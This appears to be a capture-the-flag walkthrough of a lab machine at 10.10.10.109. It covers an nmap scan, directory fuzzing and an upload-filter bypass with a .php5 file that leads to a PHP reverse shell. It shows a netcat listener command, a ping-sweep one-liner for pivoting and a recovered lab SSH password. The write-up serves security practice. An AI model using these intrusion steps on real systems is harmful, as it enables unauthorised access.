┌─[✗]─[gabrielle@parrot]─[~]└──╼$sudonmap-p--sV-sC10.10.10.109StartingNmap7.94SVN ( https://nmap.org ) at 2024-10-26 20:05 EDTNmapscanreportfor10.10.10.109Hostisup (0.057s latency).Notshown:65533closedtcpports (reset)PORTSTATESERVICEVERSION22/tcpopensshOpenSSH7.2p2Ubuntu4ubuntu2.4 (Ubuntu Linux;protocol2.0)|ssh-hostkey:|2048a6:9d:0f:7d:73:75:bb:a8:94:0a:b7:e3:fe:1f:24:f4 (RSA)|2562c:7c:34:eb:3a:eb:04:03:ac:48:28:54:09:74:3d:27 (ECDSA)|_25698:42:5f:ad:87:22:92:6d:72:e6:66:6c:82:c1:09:83 (ED25519)80/tcpopenhttpApachehttpd2.4.18 ((Ubuntu))|_http-title:Sitedoesn't have a title (text/html; charset=UTF-8).|_http-server-header: Apache/2.4.18 (Ubuntu)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 21.91 seconds
Port 80
We have this page
Wfuzz was useless from root but it mentionned a customer.
If we try to go to /sparklays we get a Forbidden which means that we could try wfuzz again but with this.
I had to wfuzz multiple times but here are the commands and interesting results I got:
In the meantime, wfuzz was quite a pain so I tried gobuster which I usually prefer (but wanted to try out wfuzz lol).
And I got this
So from these we have:
On login.php we get an access denied
But on admin.php we get a login page
Login
I tried bruteforcing along with possible weak password but did not get anywhere.
On /design/design.html we get this
And if we click on change logo we end up here so we can play with the upload function.
change logo
I tried a few file extensions and got this working with php5.
So I downloaded php-reverse-shell.php5 on the server after modifying the file with my ip address.
I set up my listener nc -nlvp 4444
And then I accessed this page from the browser (remember the uploads directory we found before)
http://10.10.10.109/sparklays/design/uploads/php-reverse-shell.php5
And I got a shell as www-data:
Shell
I chose to play with this machine because I wanted to practice pivoting.
So let's check what we have available here in terms of network with arp -a (if for some reason arp -a does not work a friend of mine uses a cool command for i in {1..254} ;do (ping 192.168.122.$i -c 1 -w 5 >/dev/null && echo "192.168.122.$i" &) ;done).
But here arp -a works and we get this:
But first let's see if we can mobe to a user. if we ls on /home we have 2 users dave and alex.
If we go to dave's Desktop we find this.
So let's try to ssh as Dave (with the password we found Dav3therav3123). It works: